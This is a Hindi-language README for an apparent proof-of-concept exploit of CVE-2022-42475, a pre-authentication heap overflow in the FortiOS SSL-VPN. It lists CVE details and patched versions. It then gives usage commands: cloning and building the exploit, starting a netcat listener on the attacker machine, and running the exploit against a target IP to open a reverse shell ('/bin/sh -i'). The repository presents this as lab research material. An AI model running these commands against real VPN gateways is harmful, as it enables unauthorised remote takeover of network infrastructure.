
CVE-2022-42475 के अनुसंधान और नियंत्रित प्रयोगशाला सत्यापन के लिए प्रूफ ऑफ कॉन्सेप्ट (PoC), जो FortiOS के कुछ संस्करणों में SSL-VPN सेवा को प्रभावित करने वाली एक गंभीर हीप-आधारित बफर ओवरफ्लो भेद्यता है।
Fortinet SSL VPN प्री-ऑथेंटिकेशन रिमोट कोड निष्पादन
CVE-2022-42475 FortiOS की SSL VPN सेवा में एक heap-based buffer overflow भेद्यता है, जो बिना प्रमाणीकरण वाले हमलावरों को /remote/error एंडपॉइंट पर लक्षित विशेष रूप से तैयार किए गए HTTP अनुरोधों के माध्यम से दूरस्थ रूप से मनमाना कोड निष्पादित करने (RCE) की अनुमति देती है।
यह भेद्यता आधिकारिक पैच प्रकाशित होने से पहले सक्रिय रूप से वास्तविक दुनिया में (0-day) शोषित की जा चुकी थी।
निम्नलिखित स्क्रीनशॉट एक अधिकृत प्रयोगशाला वातावरण में PoC के निष्पादन को दर्शाता है:
आउटपुट PoC के निष्पादन और परीक्षण के लिए उपयोग की गई FortiOS इंस्टेंस के साथ इंटरैक्शन को दर्शाता है।

| फ़ील्ड | मान |
|---|
| CVE ID | CVE-2022-42475 |
| CVSS 3.1 | 9.3 (गंभीर) |
| वेक्टर | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| CWE | CWE-122 |
| खोजा गया | दिसंबर 2022 |
| आधिकारिक पैच | FortiOS 7.2.3, 7.0.9, 6.4.11, 6.2.12, 6.0.16 |
# स्रोत कोड को क्लोन या डाउनलोड करें
git clone https://github.com/uLl0a/cve-2022-42475-poc
cd cve-2022-42475-poc
# संकलित करें
go build -o exploit exploit.go
# या सीधे चलाएँ
go run exploit.go <target> <port> <reverse_ip> <params>
./exploit <target_host> <target_port> <reverse_ip> <param1> [param2...]
# हमलावर पर, listener प्रारंभ करें
nc -lvnp 80
# एक्सप्लॉइट निष्पादित करें
./exploit 192.168.1.100 443 10.0.0.5 /bin/sh -i